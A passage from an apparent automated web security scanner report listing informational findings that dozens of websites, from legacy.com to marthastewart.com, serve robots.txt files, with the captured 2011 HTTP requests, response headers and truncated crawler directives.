Cache-Control: private, max-age=219
Date: Sat, 02 Apr 2011 13:23:07 GMT
Content-Length: 148
Connection: close

User-agent: *
Disallow: *,email.*
Disallow: /search/
Disallow: /about/adops/
Disallow: /about/adops/hp/
Sitemap: http://www.latimes.com/sitemap.xml
24.475. http://www.legacy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.legacy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.legacy.com

Response

HTTP/1.1 200 OK
Connection: keep-alive
Date: Sat, 02 Apr 2011 12:43:21 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Content-Length: 4121
Content-Type: text/plain
Set-Cookie: ASPSESSIONIDCCQBSDTA=PBKDEMHDEIKBMBNGAIKCLADH; path=/
Cache-control: private

Sitemap: http://www.legacy.com/sitemap.xml

User-agent: Googlebot/
Disallow: /Images
Disallow: /Multimedia
Disallow: /Services/admina.asp
Disallow: /Services/adminc.asp
Disallow: /ObitNetworkDe
...[SNIP]...
24.476. http://www.letssingit.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.letssingit.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.letssingit.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:59:03 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 05 Nov 2010 12:28:22 GMT
ETag: "c2825a-1f3-4944d69026580"
Accept-Ranges: bytes
Content-Length: 499
Connection: close
Content-Type: text/plain; charset=iso-8859-1

User-agent: *
Sitemap: http://artists.letssingit.com/sitemap_index.xml
Disallow: /cgi-exe/am.cgi?a=artists_song_lyrics_print&
Disallow: /cgi-exe/am.cgi?a=artists_song_lyrics_send_form&
Disallow: /
...[SNIP]...
24.477. http://www.levi.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.levi.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.levi.com

Response

HTTP/1.0 200 OK
Content-Length: 76
Content-Type: text/plain
Last-Modified: Thu, 28 Aug 2008 22:38:10 GMT
Accept-Ranges: bytes
ETag: "0f56dbf5e9c91:125e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:27:25 GMT
Connection: close

# robots.txt for http://www.levi.com/

User-agent: *
Disallow: /common/
24.478. http://www.lg.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lg.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lg.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:44 GMT
Server: Apache
Last-Modified: Wed, 16 Mar 2011 08:47:46 GMT
ETag: "a0b5b-1aab-994b3080"
Accept-Ranges: bytes
Content-Length: 6827
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=86400
Via: 1.1 s0-kt10-sel (jaguar/3.0-11), 1.1 usmn02slh002 (jaguar/3.0-11)
Cache Result : HIT
Age: 19738
Connection: close

# Disallow all crawlers access to certain pages.

User-agent: *
Allow: /
Disallow: /error
Disallow: /common
Disallow: /templatedata
Disallow: /war
Disallow: /download/support/contactus
Disallow: /adm

...[SNIP]...
24.479. http://www.life123.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.life123.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.life123.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:52:47 GMT
Server: Apache
Last-Modified: Tue, 15 Mar 2011 04:00:47 GMT
Accept-Ranges: bytes
Content-Length: 564
Content-Type: text/plain; charset=UTF-8
Connection: close

User-agent: Googlebot
Disallow: /afc-match

User-agent: googlebot-image
Disallow: /afc-match

User-agent: googlebot-mobile
Disallow: /afc-match

User-agent: MSNBot
Disallow: /afc-match

User-agent: Sl
...[SNIP]...
24.480. http://www.lifescript.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifescript.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lifescript.com

Response

HTTP/1.0 200 OK
Content-Length: 871
Content-Type: text/plain
Last-Modified: Wed, 30 Mar 2011 21:24:58 GMT
Accept-Ranges: bytes
ETag: "f0201bec20efcb1:1b99"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="CAO CNT COM CUR DEV DSP NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sat, 02 Apr 2011 13:37:57 GMT
Connection: close

...User-agent: * #Allows all bots

Disallow: /rewards/
Disallow: /search
Disallow: /css
Disallow: /js/
Disallow: /JavaScript/
Disallow: /Services
Disallow: /images/
Disallow: /html/
Disall
...[SNIP]...
24.481. http://www.lijit.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lijit.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:07 GMT
Server: PWS/1.7.1.5
X-Px: ms iad-agg-n6 ( iad-agg-n25), ms iad-agg-n25 ( origin>CONN)
ETag: "248113-c1-49eace405ee00"
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:45:07 GMT
Age: 0
Content-Length: 193
Content-Type: text/plain; charset=UTF-8
Last-Modified: Thu, 17 Mar 2011 12:35:04 GMT
Connection: close

User-agent: *
Disallow: /pvs/
Disallow: /custom
Disallow: /search/
Disallow: /research/
Disallow: /informers
Disallow: /users/
Disallow: /res/images/empty.gif
Disallow: /swr
Disallow: /expert/
24.482. http://www.like.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.like.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.like.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 03 Jun 2010 22:02:09 GMT
X-Like-Servetime: Servetime: D=682
Content-Type: text/plain
Vary: Host
Vary: User-Agent
Date: Sat, 02 Apr 2011 13:55:29 GMT
Content-Length: 806
Connection: close

User-Agent: *
Disallow: /hidden.py
Disallow: /lighting
Disallow: /lighting*
Disallow: /static/
Disallow: /*site:*
Disallow: /*color:*
Disallow: /*brand:*
Disallow: /*origin=*
Disallow: /*material:*
Di
...[SNIP]...
24.483. http://www.lingospot.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lingospot.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lingospot.com

Response

HTTP/1.0 200 OK
Connection: close
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: LUI=e52362dc94358781; Path=/; Expires=Fri, 31-Dec-2015 23:59:59 GMT; Domain=.lingospot.com
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "1434326728"
Last-Modified: Mon, 04 May 2009 02:09:59 GMT
Content-Length: 72
Date: Sat, 02 Apr 2011 14:04:59 GMT
Server: lighttpd/1.4.15

User-agent: *
Allow: /
Sitemap: http://www.lingospot.com/sitemap.xml.gz
24.484. http://www.linkedin.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.linkedin.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "1426348071"
Last-Modified: Mon, 28 Mar 2011 03:54:15 GMT
Content-Length: 21229
Connection: keep-alive
Date: Sat, 02 Apr 2011 12:38:02 GMT
Server: lighttpd

# Notice: If you would like to crawl LinkedIn,
# please email whitelistcrawl@linkedin.com to apply
# for white listing.

User-agent: Googlebot
Disallow: /addContacts*
Disallow: /addressBookExport*
D
...[SNIP]...
24.485. http://www.liutilities.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.liutilities.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.liutilities.com

Response

HTTP/1.1 200 OK
Content-Length: 71
Content-Type: text/plain
Content-Location: http://www.liutilities.com/robots.txt
Last-Modified: Wed, 01 Jul 2009 10:36:34 GMT
Accept-Ranges: bytes
ETag: "3ced4bce37fac91:10b4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:41:33 GMT
Connection: close

User-Agent: *
Allow: /

Sitemap: http://www.liutilities.com/sitemap.xml
24.486. http://www.livecams.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livecams.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.livecams.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:11 GMT
Server: Apache
Content-Length: 38
Last-Modified: Sat, 05 Feb 2011 00:52:06 GMT
Vary: Accept-Encoding
P3P: policyref="http://www.streamate.com/p3p/ns.xml", CP="NOI DSP COR CUR ADMa DEVa OUR IND UNI STA"
Connection: close
Content-Type: text/plain

user-agent: *
disallow: /myalerts.php
24.487. http://www.livejournal.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livejournal.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.livejournal.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
X-AWS-Id: cws06
Last-Modified: Thu, 26 Feb 2009 21:02:20 GMT
ETag: "12ffa1-1b6-463d8ab028f00"
Keep-Alive: timeout=30, max=100
Content-Type: text/plain; charset=UTF-8
X-Debug: USen (null) (null)
X-VWS-Id: bil1-varn05
Content-Length: 438
Date: Sat, 02 Apr 2011 13:26:47 GMT
X-Varnish: 827895412 824165795
Age: 32563
Via: 1.1 varnish
Connection: close

User-Agent: *
Disallow: /directory.bml

Sitemap: http://www.livejournal.com/sitemap.xml

#
# Blocked journals aren't listed here because robots.txt files
# can't be above 50k or so, depending on the s
...[SNIP]...
24.488. http://www.livenation.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livenation.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.livenation.com

Response

HTTP/1.0 200 OK
Server: Apache
X-DC-Name: 1
Last-Modified: Mon, 14 Mar 2011 17:32:52 GMT
ETag: "646-b383d900"
Accept-Ranges: bytes
Content-Length: 1606
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:56:48 GMT
Connection: close
Set-Cookie: SID=kdnDjZQYi2eyfh7yYmje7kMk7SIGv3QOFAvmsnHv-6KHeD5toI2MTg4lZ-UZjzUKvuiy1L6tGcCqYube; path=/; domain=www.livenation.com
Set-Cookie: BID=f6zRPuY6IG6yLGU5eiKhLzhgp0Q6bMGL3qR1k_a5xBewcB-2Ab7gh4vGjGbXNSpvGH0OiUKHOWzHrJnCt8CJ; path=/; domain=www.livenation.com; expires=Fri, 01-Jan-2038 00:00:01 GMT
Set-Cookie: CMPS=L8t055KF6d9r9XjY0jB4G7R5z2Ztp+hU; path=/

User-agent: *
Disallow: /seatingchart
Disallow: /change_area
Disallow: /find_area
Disallow: /error
Disallow: /cgi/outsider.plx
Disallow: /cgi/sfxoutsider.plx
Disallow: /cgi/tt.plx
Disallow: /healthche
...[SNIP]...
24.489. http://www.llbean.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.llbean.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.llbean.com

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 25 Jan 2011 06:56:14 GMT
ETag: "115ad3b-1cc-365a9f80"
Accept-Ranges: bytes
Content-Length: 460
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELa TRo IND PHY ONL UNI PUR FIN COM NAV DEM STA", policyref="/w3c/p3p.xml"
Content-Type: text/plain
Cache-Control: no-cache
Expires: Sat, 02 Apr 2011 13:34:27 GMT
Date: Sat, 02 Apr 2011 13:34:27 GMT
Connection: close

#
# robots.txt file for http://www.llbean.com
#

User-agent: *
Disallow: /js/
Disallow: /jsdata/
Disallow: /css/
Disallow: /kiosk/
Disallow: /buttons/
Disallow: /flash/
Disallow: /fsrscripts/
Disall
...[SNIP]...
24.490. http://www.loc.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.loc.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.loc.gov

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:52:49 GMT
Server: Apache
Last-Modified: Thu, 16 Dec 2010 21:49:25 GMT
ETag: "589d-f4-6f96340"
Accept-Ranges: bytes
Content-Length: 244
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /web_arch/
Disallow: /rr/mopic/staff
Disallow: /loc/volunteers
Disallow: /ficmanagers
Disallow: /preserv/extranet/
Disallow: /myloc
Disallow: /nationalfilmr
...[SNIP]...
24.491. http://www.local.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.local.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Tue, 29 Mar 2011 22:35:01 GMT
ETag: "7145bc8a61eecb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Cteonnt-Length: 1224
Cache-Control: private, max-age=35123
Date: Sat, 02 Apr 2011 12:43:15 GMT
Content-Length: 1224
Connection: close

User-agent: SBIder
Disallow: /

User-agent: Twiceler-0.9
Disallow: /

User-agent: *
Disallow: /error.aspx
Disallow: /email.aspx
Disallow: /sms.aspx
Disallow: /print.aspx
Disallow: /logout.a
...[SNIP]...
24.492. http://www.localguides.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.localguides.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.localguides.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: .ASPXANONYMOUS=qY1xe84nzAEkAAAAYjMxM2JiZjUtZThhZi00OGQwLWE0MjgtYWY5ZjNkYmRkZTRklL09sHMC2bzF_wWMIjFubqiFrSA1; expires=Sat, 11-Jun-2011 00:28:27 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=ftqnscm1r11badawjibcxwno; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: UserID=ftqnscm1r11badawjibcxwno; domain=localguides.com; expires=Sun, 02-Oct-2011 13:48:27 GMT; path=/
X-Server: WEB01
X-Powered-By: ASP.NET
p3p: CP="NOI DSP COR CURa ADMa OUR NOR"
Date: Sat, 02 Apr 2011 13:48:27 GMT
Connection: close
Content-Length: 669

Sitemap: http://www.localguides.com/sitemap.xml

User-agent: *
Disallow: /ypcyellow/

User-agent: Mediapartners-Google
Disallow:

User-agent: Googlebot
Disallow:

User-agent: Slurp
Disallo
...[SNIP]...
24.493. http://www.localpages.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.localpages.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.localpages.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:24:21 GMT
Server: Apache
Last-Modified: Mon, 28 Mar 2011 20:34:53 GMT
ETag: "2a8738-39-49f90e03c5540"
Accept-Ranges: bytes
Content-Length: 57
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /ajaxGoogleMap.php
Allow: /

24.494. http://www.lowermybills.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lowermybills.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lowermybills.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:59 GMT
Server: Apache
Set-Cookie: SERVER_COOKIE=173.193.214.243.1301751119999871; path=/; expires=Mon, 01-Apr-13 13:31:59 GMT
Last-Modified: Wed, 30 Mar 2011 22:40:56 GMT
ETag: "56242-4a-49fbadeb54e00"
Accept-Ranges: bytes
Content-Length: 74
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain
Set-Cookie: BIGipServerpl.lmbprod=553918474.20480.0000; path=/

User-agent: *
Disallow: /images/
Disallow: /javascript/
Disallow: /style/
24.495. http://www.lowes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lowes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lowes.com

Response

HTTP/1.0 200 OK
Last-Modified: Sun, 27 Mar 2011 04:26:08 GMT
Accept-Ranges: bytes
Content-Length: 465
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:24:35 GMT
Connection: close

# robots.txt for http://www.lowes.com/

User-agent: *
Disallow: /*cm_cr=*
Disallow: /*No=*
Disallow: /*rpp=*
Disallow: /*Ns=p_product_price*
Disallow: /*Ns=p_product_brand_name*
Disallow: /*Ns
...[SNIP]...
24.496. http://www.lowfares.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lowfares.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lowfares.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:42 GMT
Server: Apache/2.0.52 (CentOS)
Set-Cookie: sid=1; path=/; expires=Tue, 01-Apr-2014 14:05:42 GMT
Set-Cookie: pageview=0; path=/; expires=Sat, 02-Apr-2011 15:05:42 GMT
Content-Length: 37
P3P: policyref="/static/policy.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Connection: close


User-agent: *
Disallow: /rsshandler
24.497. http://www.lyrics007.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lyrics007.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lyrics007.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 18:16:49 GMT
Server: Apache/2.0.46 (Red Hat)
Last-Modified: Thu, 23 Oct 2008 12:29:34 GMT
ETag: "3480cc-5b-d1356780"
Accept-Ranges: bytes
Content-Length: 91
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 18:16:49 GMT
Connection: close
Content-Type: text/plain
Content-Language: en

User-agent: *
Disallow: /*?
User-agent: Googlebot
Disallow: /urlredirect*/
Disallow: /*?
24.498. http://www.lyricsmode.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lyricsmode.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lyricsmode.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:26:28 GMT
Content-Type: text/plain
Content-Length: 191
Last-Modified: Thu, 06 Aug 2009 08:51:24 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /?i=print_lyrics
Disallow: /favorites.php
Disallow: /i/scroll.swf
Disallow: /search.php
Disallow: /ringtones.php

Sitemap: http://www.lyricsmode.com/sitemap.xml
24.499. http://www.macraesbluebook.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.macraesbluebook.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.macraesbluebook.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 16 Mar 2011 20:58:44 GMT
Accept-Ranges: bytes
ETag: "b6fd5f01ce4cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:51:20 GMT
Connection: close
Content-Length: 67

User-agent: *
Disallow:

User-agent: gsa-crawler
Disallow: /
24.500. http://www.macrumors.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.macrumors.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.macrumors.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:37 GMT
Server: Apache/1.3.41 (Unix) PHP/4.4.9 mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.8b
Last-Modified: Mon, 17 Nov 2008 12:12:38 GMT
ETag: "1e3801a-101-49215fb6"
Accept-Ranges: bytes
Content-Length: 257
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /c.php
Disallow: /members/c.php
Disallow: /page2/c.php
Disallow: /page2/t.php
Disallow: /rate.php3
Disallow: /dtlink.php
Disallow: /t.php
Disallow: /submit.php3
Disallow: /abou
...[SNIP]...
24.501. http://www.macys.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.macys.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.macys.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Fri, 25 Mar 2011 17:59:38 GMT
ETag: "3b0b1-7f-5b7e9680"
Cache-Control: max-age=0, no-cache
Pragma: no-cache
X-Cnection: close
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:26:32 GMT
Content-Length: 127
Connection: close
Set-Cookie: stop_mobi=yes; expires=Sat, 02-Apr-2011 13:56:32 GMT; path=/; domain=.macys.com

User-agent: *
Crawl-delay: 120
Disallow: /compare
Disallow: /registry/wedding/compare
Disallow: /catalog/product/zoom.jsp
24.502. http://www.made-in-china.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.made-in-china.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.made-in-china.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:03:08 GMT
Server: Apache
Last-Modified: Thu, 24 Mar 2011 12:23:47 GMT
ETag: "1f4877f-1d3-49f398c8f5ac0"
Accept-Ranges: bytes
Content-Length: 467
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

# created by Yongzhong Xie
# robots.txt for Made-in-China.com
# Do not delete this file ! Please contact xyz@focuschina.com
# <URL:http://www.robotstxt.org/wc/exclusion.html#robotstxt>
# Format is:
#
...[SNIP]...
24.503. http://www.mail.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mail.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mail.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:29 GMT
Server: Apache
Last-Modified: Wed, 01 Dec 2010 16:10:04 GMT
Accept-Ranges: bytes
Content-Length: 3547
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

Sitemap: http://www.mail.com/sitemapindex.xml
User-agent: *
Disallow: /*?ls=*
Disallow: /*?localePreference=*
Disallow: /*;jsessionid=*
Disallow: /*;kid=*
Disallow: /company/
Disallow: /int/company/


...[SNIP]...
24.504. http://www.mainstreet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mainstreet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mainstreet.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:45 GMT
Server: Apache
Last-Modified: Mon, 25 Feb 2008 02:18:25 GMT
ETag: "660-446f22fcf7e40"
Accept-Ranges: bytes
Content-Length: 1632
X-Debug: msweb04
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.7.2.2 2008/02/25 02:18:25 drumm Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by site
...[SNIP]...
24.505. http://www.manualsonline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manualsonline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.manualsonline.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:46:14 GMT
Server: Apache/2.2.14 (Fedora)
Last-Modified: Wed, 09 Feb 2011 21:36:47 GMT
ETag: "d746d9-56-49be04310d9c0"
Accept-Ranges: bytes
Content-Length: 86
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *

Disallow: /images/

Sitemap: http://www.manualsonline.com/sitemap.txt

24.506. http://www.mapquest.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mapquest.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mapquest.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_Id=ZGVmYXVsdDpudWxs; Path=/
Set-Cookie: tsession="uXWyZWtQOfvmKn3E//WwKePBgJ0="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Sat, 02-Apr-2011 13:07:31 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Sat, 02-Apr-2011 12:52:31 GMT; Path=/
Set-Cookie: psession="pvLd+an210uFXdeP0htNYY/wgmY="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Fri, 01-Jul-2011 12:37:31 GMT; Path=/
Set-Cookie: c_Id=MjMzOjM5Mw%3D%3D; Expires=Sat, 02-Apr-2011 13:07:31 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"77-1301684392000"
Last-Modified: Fri, 01 Apr 2011 18:59:52 GMT
Content-Type: text/plain
Content-Length: 77
Date: Sat, 02 Apr 2011 12:37:31 GMT
Connection: keep-alive

User-agent: *
Disallow: /print
Sitemap: http://www.mapquest.com/sitemap.xml
24.507. http://www.mapsofworld.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mapsofworld.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mapsofworld.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:32 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.25 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Thu, 24 Mar 2011 09:19:28 GMT
ETag: "f9060a-264-49f36f9646800"
Accept-Ranges: bytes
Content-Length: 612
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# robots.txt for http://www.mapsofworld.com/
User-agent: *
Disallow: /cgi-bin/ # This is an infinite virtual URL space
Disallow: /stats/ # these will soon disappear
Disallow: egypt/test/
Disallow
...[SNIP]...
24.508. http://www.marriott.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marriott.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.marriott.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server/6.1.0.33 Apache/2.0.47 (Unix) DAV/2
Last-Modified: Thu, 10 Jun 2010 18:54:07 GMT
ETag: "266a9-354-8c0b91c0"
Accept-Ranges: bytes
Content-Length: 852
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/plain
Cache-Control: max-age=1902
Expires: Sat, 02 Apr 2011 14:05:15 GMT
Date: Sat, 02 Apr 2011 13:33:33 GMT
Connection: close

#
# Robots.txt file for Marriott.com
# Bans ALL robots from the accessing the following paths
#

User-agent: *
Disallow: /Channels/
Disallow: /reservation/
Disallow: /search/findHotels.mi
Dis
...[SNIP]...
24.509. http://www.marthastewart.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marthastewart.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.marthastewart.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 16 Feb 2011 15:51:32 GMT
ETag: "146db4-134-413ea900"
Cteonnt-Length: 308
Content-Type: text/plain
